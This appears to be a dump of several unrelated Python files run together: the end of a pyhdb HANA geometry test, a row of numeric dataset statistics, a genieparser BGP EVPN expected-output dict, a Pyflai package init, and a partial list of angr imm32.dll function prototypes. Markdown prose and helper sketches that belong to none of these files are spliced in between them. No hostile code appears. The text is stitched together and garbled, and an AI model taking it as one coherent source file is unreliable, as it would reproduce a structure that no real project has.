b"\x1d\xae\x4d\x55\x4c\x54\x49\x50\x4f\x4c\x59\x47\x4f\x4e\x20\x28\x28" + \
b"\x28\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x20\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x2c\x20\x30\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x20\x30\x2e\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x20\x2d\x31\x2e\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x20" + \
b"\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x20\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x29\x29\x29"),
])
def test_pack_geometry_wkt(given, expected):
    assert types.Geometry.prepare(given) == expected
# #############################################################################################################
# Real HANA interaction with geometry (integration tests)
# #############################################################################################################
import tests.helper
TABLE = 'PYHDB_TEST_GEOMETRY'
TABLE_POINT = TABLE + "_POINT"
TABLE_GEOMETRY = TABLE + "_GEOMETRY"
TABLE_FIELDS_POINT = "point ST_POINT NOT NULL"
TABLE_FIELDS_GEOMETRY = "geo ST_GEOMETRY NOT NULL"
@pytest.fixture
def test_table_point(request, connection):
    tests.helper.create_table_fixture(request, connection, TABLE_POINT,
                                      TABLE_FIELDS_POINT, column_table=True)


@pytest.fixture
def test_table_geometry(request, connection):
    tests.helper.create_table_fixture(request, connection, TABLE_GEOMETRY,
                                      TABLE_FIELDS_GEOMETRY, column_table=True)
@pytest.mark.hanatest
def test_insert_point(connection, test_table_point):
    """Insert spatial point into table"""
    cursor = connection.cursor()
    # random.randint() requires integer bounds; the coordinates are rendered
    # as floats by the %f formatting below.
    point_x = random.randint(-100, 100)
    point_y = random.randint(-100, 100)
    wkt_string = "POINT(%f %f)" % (point_x, point_y)
    cursor.execute("insert into %s (point) values (:1)" % TABLE_POINT, [wkt_string])
    connection.commit()

    cursor = connection.cursor()
    row = cursor.execute('select point.ST_X(), point.ST_Y() from %s' % TABLE_POINT).fetchone()
    assert row[0] == point_x
    assert row[1] == point_y
@pytest.mark.hanatest
def test_insert_linestring(connection, test_table_geometry):
    """Insert spatial linestring into table"""
    cursor = connection.cursor()
    point1_x = random.randint(-100, 100)
    point1_y = random.randint(-100, 100)
    point2_x = random.randint(-100, 100)
    point2_y = random.randint(-100, 100)
    wkt_string = "LINESTRING(%f %f, %f %f)" % (point1_x, point1_y, point2_x, point2_y)
    cursor.execute("insert into %s (geo) values (:1)" % TABLE_GEOMETRY, [wkt_string])
    connection.commit()

    cursor = connection.cursor()
    sql = """
        Select geo.ST_StartPoint().ST_X(), geo.ST_StartPoint().ST_Y(),
               geo.ST_EndPoint().ST_X(), geo.ST_EndPoint().ST_Y()
        From %s
    """
    row = cursor.execute(sql % TABLE_GEOMETRY).fetchone()
    assert row[0] == point1_x
    assert row[1] == point1_y
    assert row[2] == point2_x
    assert row[3] == point2_y
@pytest.mark.hanatest
def test_insert_polygon(connection, test_table_geometry):
    """Insert spatial polygon into table"""
    cursor = connection.cursor()
    # The edges of a polygon cannot cross, so we build an arbitrary quadrangle
    # with one vertex in each quadrant.
    point1_x = random.randint(0, 100)
    point1_y = random.randint(0, 100)
    point2_x = random.randint(0, 100)
    point2_y = random.randint(-100, 0)
    point3_x = random.randint(-100, 0)
    point3_y = random.randint(-100, 0)
    point4_x = random.randint(-100, 0)
    point4_y = random.randint(0, 100)
    wkt_string = "POLYGON((%f %f, %f %f, %f %f, %f %f, %f %f))" % (
        point1_x, point1_y, point2_x, point2_y, point3_x, point3_y,
        point4_x, point4_y, point1_x, point1_y
    )
    cursor.execute("insert into %s (geo) values (:1)" % TABLE_GEOMETRY, [wkt_string])
    connection.commit()

    cursor = connection.cursor()
    # We don't want to check all points of the polygon; checking the
    # minimal and maximal coordinates (the bounding box) is enough.
    sql = """
        Select geo.ST_XMin(), geo.ST_XMax(), geo.ST_YMin(), geo.ST_YMax()
        From %s
    """
    row = cursor.execute(sql % TABLE_GEOMETRY).fetchone()
    assert row[0] == min(point1_x, point2_x, point3_x, point4_x)
    assert row[1] == max(point1_x, point2_x, point3_x, point4_x)
    assert row[2] == min(point1_y, point2_y, point3_y, point4_y)
    assert row[3] == max(point1_y, point2_y, point3_y, point4_y)
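The polygon test closes its ring by repeating the first vertex at the end of the coordinate list, as WKT requires. A small helper makes that convention explicit; `polygon_wkt` is a hypothetical name used only for illustration, not part of this test suite.

```python
def polygon_wkt(points):
    # Close the ring by repeating the first vertex, as the test above does
    # by hand when it appends (point1_x, point1_y) a second time.
    ring = list(points) + [points[0]]
    coords = ", ".join("%f %f" % (x, y) for x, y in ring)
    return "POLYGON((%s))" % coords
```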
| 54.3125 | 111 | 0.63735 | 2,062 | 12,166 | 3.699806 | 0.067895 | 0.621313 | 0.815179 | 0.94534 | 0.836807 | 0.806397 | 0.762223 | 0.716477 | 0.709136 | 0.694586 | 0 | 0.33311 | 0.140802 | 12,166 | 223 | 112 | 54.556054 | 0.396728 | 0.034029 | 0 | 0.287179 | 0 | 0.384615 | 0.603918 | 0.455639 | 0 | 0 | 0 | 0 | 0.061538 | 1 | 0.035897 | false | 0 | 0.025641 | 0 | 0.061538 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14 |
# src/genie/libs/parser/iosxe/tests/ShowIpBgpL2VPNEVPN/cli/equal/golden_output13_expected.py
# (balmasea/genieparser, Apache-2.0)
expected_output = {
'instance':{
'default':{
'vrf':{
'evi_11':{
'address_family':{
'l2vpn evpn':{
'prefixes':{
'[2][3.3.3.3:11][0][48][AABBCCDD0011][32][192.168.2.100]/24':{
'table_version':'30',
'nlri_data':{
'route-type':'2',
'rd':'3.3.3.3:11',
'eti':'0',
'mac_len':'48',
'mac':'AABBCCDD0011',
'ip_len':'32',
'ip_prefix':'192.168.2.100',
'subnet':'24'
},
'available_path':'2',
'best_path':'2',
'paths':'2 available, best #2, table evi_11',
'index':{
1:{
'next_hop':'55.55.55.55',
'gateway':'1.1.1.1',
'originator':'1.1.1.1',
'next_hop_via':'default',
'update_group':1,
'evpn':{
'evpn_esi':'00000000000000000000',
'label':10000,
'ext_community':'RT:3:11 RT:3:100 ENCAP:8 EVPN DEF GW:0:0'
},
'recipient_pathid':'0',
'transfer_pathid':'0'
},
2:{
'next_hop':'::',
'gateway':'0.0.0.0',
'originator':'3.3.3.3',
'next_hop_via':'default',
'update_group':1,
'evpn':{
'evpn_esi':'00000000000000000000',
'label':10000,
'ext_community':'RT:3:11 RT:3:100 ENCAP:8 EVPN DEF GW:0:0'
},
'local_vxlan_vtep':{
'vrf':'Red',
'vni':'100000',
'local_router_mac':'AC4A.67A4.1A51',
'vtep_ip':'33.33.33.33'
},
'recipient_pathid':'0',
'transfer_pathid':'0x0'
}
}
},
'[2][3.3.3.3:11][0][48][AABBCCDD0011][128][2001:192:168:2::100]/36':{
'table_version':'31',
'nlri_data':{
'route-type':'2',
'rd':'3.3.3.3:11',
'eti':'0',
'mac_len':'48',
'mac':'AABBCCDD0011',
'ip_len':'128',
'ip_prefix':'2001:192:168:2::100',
'subnet':'36'
},
'available_path':'2',
'best_path':'2',
'paths':'2 available, best #2, table evi_11',
'index':{
1:{
'next_hop':'55.55.55.55',
'gateway':'1.1.1.1',
'originator':'1.1.1.1',
'next_hop_via':'default',
'update_group':1,
'evpn':{
'evpn_esi':'00000000000000000000',
'label':10000,
'ext_community':'RT:3:11 RT:3:100 ENCAP:8 EVPN DEF GW:0:0'
},
'recipient_pathid':'0',
'transfer_pathid':'0'
},
2:{
'next_hop':'::',
'gateway':'0.0.0.0',
'originator':'3.3.3.3',
'next_hop_via':'default',
'update_group':1,
'evpn':{
'evpn_esi':'00000000000000000000',
'label':10000,
'ext_community':'RT:3:11 RT:3:100 ENCAP:8 EVPN DEF GW:0:0'
},
'local_vxlan_vtep':{
'vrf':'Red',
'vni':'100000',
'local_router_mac':'AC4A.67A4.1A51',
'vtep_ip':'33.33.33.33'
},
'recipient_pathid':'0',
'transfer_pathid':'0x0'
}
}
},
'[2][3.3.3.3:11][0][48][D4E880B0D802][0][*]/20':{
'table_version':'4',
'nlri_data':{
'route-type':'2',
'rd':'3.3.3.3:11',
'eti':'0',
'mac_len':'48',
'mac':'D4E880B0D802',
'ip_len':'0',
'subnet':'20'
},
'available_path':'1',
'best_path':'1',
'paths':'1 available, best #1, table evi_11',
'index':{
1:{
'next_hop':'::',
'gateway':'0.0.0.0',
'originator':'3.3.3.3',
'next_hop_via':'default',
'update_group':1,
'localpref':100,
'weight':'32768',
'origin_codes':'?',
'status_codes':'*>',
'refresh_epoch':1,
'route_info':'Local',
'imported_path_from':'[2][5.5.5.5:11][0][48][AABBCCDD0011][128][2001:192:168:2::100]/36 (global)',
'evpn':{
'evpn_esi':'00000000000000000000',
'label':10000,
'ext_community':'RT:3:11 ENCAP:8'
},
'local_vxlan_vtep':{
'vrf':'Red',
'vni':'100000',
'local_router_mac':'AC4A.67A4.1A51',
'vtep_ip':'33.33.33.33'
},
'recipient_pathid':'0',
'transfer_pathid':'0x0'
}
}
},
'[2][3.3.3.3:11][0][48][D4E880B0D802][32][192.168.2.1]/24':{
'table_version':'5',
'nlri_data':{
'route-type':'2',
'rd':'3.3.3.3:11',
'eti':'0',
'mac_len':'48',
'mac':'D4E880B0D802',
'ip_len':'32',
'ip_prefix':'192.168.2.1',
'subnet':'24'
},
'available_path':'1',
'best_path':'1',
'paths':'1 available, best #1, table evi_11',
'index':{
1:{
'next_hop':'::',
'gateway':'0.0.0.0',
'originator':'3.3.3.3',
'next_hop_via':'default',
'update_group':1,
'localpref':100,
'weight':'32768',
'origin_codes':'?',
'status_codes':'*>',
'refresh_epoch':1,
'route_info':'Local',
'imported_path_from':'[2][5.5.5.5:11][0][48][AABBCCDD0011][128][2001:192:168:2::100]/36 (global)',
'local_vxlan_vtep':{
'vrf':'Red',
'vni':'100000',
'local_router_mac':'AC4A.67A4.1A51',
'vtep_ip':'33.33.33.33'
},
'recipient_pathid':'0',
'transfer_pathid':'0x0'
}
}
},
'[2][3.3.3.3:11][0][48][D4E880B0D802][128][2001:192:168:2::1]/36':{
'table_version':'6',
'nlri_data':{
'route-type':'2',
'rd':'3.3.3.3:11',
'eti':'0',
'mac_len':'48',
'mac':'D4E880B0D802',
'ip_len':'128',
'ip_prefix':'2001:192:168:2::1',
'subnet':'36'
},
'available_path':'1',
'best_path':'1',
'paths':'1 available, best #1, table evi_11',
'index':{
1:{
'next_hop':'::',
'gateway':'0.0.0.0',
'originator':'3.3.3.3',
'next_hop_via':'default',
'update_group':1,
'localpref':100,
'weight':'32768',
'origin_codes':'?',
'status_codes':'*>',
'refresh_epoch':1,
'route_info':'Local',
'imported_path_from':'[2][5.5.5.5:11][0][48][AABBCCDD0011][128][2001:192:168:2::100]/36 (global)',
'local_vxlan_vtep':{
'vrf':'Red',
'vni':'100000',
'local_router_mac':'AC4A.67A4.1A51',
'vtep_ip':'33.33.33.33'
},
'recipient_pathid':'0',
'transfer_pathid':'0x0'
}
}
},
'[2][3.3.3.3:11][0][48][D4E880B0D802][128][FE80::D6E8:80FF:FEB0:D802]/36':{
'table_version':'7',
'nlri_data':{
'route-type':'2',
'rd':'3.3.3.3:11',
'eti':'0',
'mac_len':'48',
'mac':'D4E880B0D802',
'ip_len':'128',
'ip_prefix':'FE80::D6E8:80FF:FEB0:D802',
'subnet':'36'
},
'available_path':'1',
'best_path':'1',
'paths':'1 available, best #1, table evi_11',
'index':{
1:{
'next_hop':'::',
'gateway':'0.0.0.0',
'originator':'3.3.3.3',
'next_hop_via':'default',
'update_group':1,
'localpref':100,
'weight':'32768',
'origin_codes':'?',
'status_codes':'*>',
'refresh_epoch':1,
'route_info':'Local',
'imported_path_from':'[2][5.5.5.5:11][0][48][AABBCCDD0011][128][2001:192:168:2::100]/36 (global)',
'local_vxlan_vtep':{
'vrf':'Red',
'vni':'100000',
'local_router_mac':'AC4A.67A4.1A51',
'vtep_ip':'33.33.33.33'
},
'recipient_pathid':'0',
'transfer_pathid':'0x0'
}
}
},
'[3][3.3.3.3:11][0][32][33.33.33.33]/17':{
'table_version':'14',
'nlri_data':{
'route-type':'3',
'rd':'3.3.3.3:11',
'eti':'0',
'ip_len':'32',
'orig_rtr_id':'33.33.33.33',
'subnet':'17'
},
'available_path':'1',
'best_path':'1',
'paths':'1 available, best #1, table evi_11',
'index':{
1:{
'next_hop':'::',
'gateway':'0.0.0.0',
'originator':'3.3.3.3',
'next_hop_via':'default',
'update_group':1,
'localpref':100,
'weight':'32768',
'origin_codes':'?',
'status_codes':'*>',
'refresh_epoch':1,
'route_info':'Local',
'imported_path_from':'[2][5.5.5.5:11][0][48][AABBCCDD0011][128][2001:192:168:2::100]/36 (global)',
'ext_community':'RT:3:11 ENCAP:8',
'pmsi':{
'tun_type':'IR',
'vni':'10000',
'tun_id':{
'local':True
}
},
'local_vxlan_vtep':{
'vrf':'Red',
'vni':'100000',
'local_router_mac':'AC4A.67A4.1A51',
'vtep_ip':'33.33.33.33'
},
'recipient_pathid':'0',
'transfer_pathid':'0x0'
}
}
},
'[3][3.3.3.3:11][0][32][55.55.55.55]/17':{
'table_version':'34',
'nlri_data':{
'route-type':'3',
'rd':'3.3.3.3:11',
'eti':'0',
'ip_len':'32',
'orig_rtr_id':'55.55.55.55',
'subnet':'17'
},
'available_path':'1',
'best_path':'1',
'paths':'1 available, best #1, table evi_11',
'index':{
1:{
'next_hop':'55.55.55.55',
'gateway':'1.1.1.1',
'originator':'1.1.1.1',
'next_hop_via':'default',
'localpref':100,
'origin_codes':'?',
'status_codes':'*>',
'refresh_epoch':2,
'route_info':'1 2',
'imported_path_from':'[3][5.5.5.5:11][0][32][55.55.55.55]/17 (global)',
'ext_community':'RT:3:11 ENCAP:8',
'pmsi':{
'tun_type':'IR',
'vni':'10000',
'tun_id':{
'tun_endpoint':'55.55.55.55'
}
},
'recipient_pathid':'0',
'transfer_pathid':'0x0'
}
}
}
},
'route_distinguisher':'3.3.3.3:11'
}
}
}
}
}
}
}
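# The golden output above nests EVPN prefixes under
# instance -> vrf -> address_family -> prefixes. A small sketch of walking a
# dict of that shape (the helper and the tiny sample are ours, not part of
# genieparser):

```python
def best_path_by_prefix(parsed):
    """Map each EVPN prefix in a parsed 'show ip bgp l2vpn evpn' dict
    (of the shape above) to its advertised best-path index."""
    result = {}
    for inst in parsed.get("instance", {}).values():
        for vrf in inst.get("vrf", {}).values():
            for af in vrf.get("address_family", {}).values():
                for prefix, data in af.get("prefixes", {}).items():
                    result[prefix] = data.get("best_path")
    return result


# Tiny synthetic sample in the same shape as expected_output above.
sample = {
    "instance": {"default": {"vrf": {"evi_11": {"address_family": {
        "l2vpn evpn": {"prefixes": {
            "[3][3.3.3.3:11][0][32][55.55.55.55]/17": {"best_path": "1"},
        }},
    }}}}},
}
```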
# Pyflai/system/filesystem/__init__.py (CMakerA/Pyflai, Apache-2.0)
__all__ = ["File", "Directory"]
from Pyflai.system.filesystem.File import *
from Pyflai.system.filesystem.Directory import *
# angr/procedures/definitions/win32_imm32.py (r4b3rt/angr, BSD-2-Clause)
# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("imm32.dll")
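# Most imm32 exports declared below come in ANSI/Unicode pairs (a trailing
# 'A' or 'W', e.g. ImmInstallIMEA / ImmInstallIMEW) that share one signature
# up to the character type. A pure-Python sketch of grouping such export
# names by base name (our own illustration, not part of angr's API):

```python
def pair_ansi_unicode(names):
    """Group Win32 export names by base name, collecting their A/W suffixes.

    Names without a trailing 'A' or 'W' are recorded with suffix None.
    Note this heuristic would also strip a legitimate final 'A'/'W' that is
    not a charset suffix, so it is only a sketch.
    """
    pairs = {}
    for name in names:
        if name and name[-1] in "AW":
            base, suffix = name[:-1], name[-1]
        else:
            base, suffix = name, None
        pairs.setdefault(base, set()).add(suffix)
    return pairs


exports = ["ImmInstallIMEA", "ImmInstallIMEW", "ImmGetContext", "ImmIsUIMessageA"]
grouped = pair_ansi_unicode(exports)
```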
prototypes = \
{
#
'ImmInstallIMEA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["lpszIMEFileName", "lpszLayoutText"]),
#
'ImmInstallIMEW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["lpszIMEFileName", "lpszLayoutText"]),
#
'ImmGetDefaultIMEWnd': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0"]),
#
'ImmGetDescriptionA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "lpszDescription", "uBufLen"]),
#
'ImmGetDescriptionW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "lpszDescription", "uBufLen"]),
#
'ImmGetIMEFileNameA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "lpszFileName", "uBufLen"]),
#
'ImmGetIMEFileNameW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "lpszFileName", "uBufLen"]),
#
'ImmGetProperty': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1"]),
#
'ImmIsIME': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0"]),
#
'ImmSimulateHotKey': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1"]),
#
'ImmCreateContext': SimTypeFunction([], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)),
#
'ImmDestroyContext': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0"]),
#
'ImmGetContext': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0"]),
#
'ImmReleaseContext': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1"]),
#
'ImmAssociateContext': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0", "param1"]),
#
'ImmAssociateContextEx': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "param2"]),
#
'ImmGetCompositionStringA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "lpBuf", "dwBufLen"]),
#
'ImmGetCompositionStringW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "lpBuf", "dwBufLen"]),
#
'ImmSetCompositionStringA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="SET_COMPOSITION_STRING_TYPE"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "dwIndex", "lpComp", "dwCompLen", "lpRead", "dwReadLen"]),
#
'ImmSetCompositionStringW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="SET_COMPOSITION_STRING_TYPE"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "dwIndex", "lpComp", "dwCompLen", "lpRead", "dwReadLen"]),
#
'ImmGetCandidateListCountA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "lpdwListCount"]),
#
'ImmGetCandidateListCountW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "lpdwListCount"]),
#
'ImmGetCandidateListA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "dwStyle": SimTypeInt(signed=False, label="UInt32"), "dwCount": SimTypeInt(signed=False, label="UInt32"), "dwSelection": SimTypeInt(signed=False, label="UInt32"), "dwPageStart": SimTypeInt(signed=False, label="UInt32"), "dwPageSize": SimTypeInt(signed=False, label="UInt32"), "dwOffset": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="CANDIDATELIST", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "deIndex", "lpCandList", "dwBufLen"]),
#
'ImmGetCandidateListW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "dwStyle": SimTypeInt(signed=False, label="UInt32"), "dwCount": SimTypeInt(signed=False, label="UInt32"), "dwSelection": SimTypeInt(signed=False, label="UInt32"), "dwPageStart": SimTypeInt(signed=False, label="UInt32"), "dwPageSize": SimTypeInt(signed=False, label="UInt32"), "dwOffset": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="CANDIDATELIST", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "deIndex", "lpCandList", "dwBufLen"]),
#
'ImmGetGuideLineA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="GET_GUIDE_LINE_TYPE"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "dwIndex", "lpBuf", "dwBufLen"]),
#
'ImmGetGuideLineW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="GET_GUIDE_LINE_TYPE"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "dwIndex", "lpBuf", "dwBufLen"]),
#
'ImmGetConversionStatus': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpfdwConversion", "lpfdwSentence"]),
#
'ImmSetConversionStatus': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "param2"]),
#
'ImmGetOpenStatus': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0"]),
#
'ImmSetOpenStatus': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1"]),
#
'ImmGetCompositionFontA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"lfHeight": SimTypeInt(signed=True, label="Int32"), "lfWidth": SimTypeInt(signed=True, label="Int32"), "lfEscapement": SimTypeInt(signed=True, label="Int32"), "lfOrientation": SimTypeInt(signed=True, label="Int32"), "lfWeight": SimTypeInt(signed=True, label="Int32"), "lfItalic": SimTypeChar(label="Byte"), "lfUnderline": SimTypeChar(label="Byte"), "lfStrikeOut": SimTypeChar(label="Byte"), "lfCharSet": SimTypeChar(label="Byte"), "lfOutPrecision": SimTypeChar(label="Byte"), "lfClipPrecision": SimTypeChar(label="Byte"), "lfQuality": SimTypeChar(label="Byte"), "lfPitchAndFamily": SimTypeChar(label="Byte"), "lfFaceName": SimTypeFixedSizeArray(SimTypeBottom(label="CHAR"), 32)}, name="LOGFONTA", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lplf"]),
#
'ImmGetCompositionFontW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"lfHeight": SimTypeInt(signed=True, label="Int32"), "lfWidth": SimTypeInt(signed=True, label="Int32"), "lfEscapement": SimTypeInt(signed=True, label="Int32"), "lfOrientation": SimTypeInt(signed=True, label="Int32"), "lfWeight": SimTypeInt(signed=True, label="Int32"), "lfItalic": SimTypeChar(label="Byte"), "lfUnderline": SimTypeChar(label="Byte"), "lfStrikeOut": SimTypeChar(label="Byte"), "lfCharSet": SimTypeChar(label="Byte"), "lfOutPrecision": SimTypeChar(label="Byte"), "lfClipPrecision": SimTypeChar(label="Byte"), "lfQuality": SimTypeChar(label="Byte"), "lfPitchAndFamily": SimTypeChar(label="Byte"), "lfFaceName": SimTypeFixedSizeArray(SimTypeChar(label="Char"), 32)}, name="LOGFONTW", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lplf"]),
#
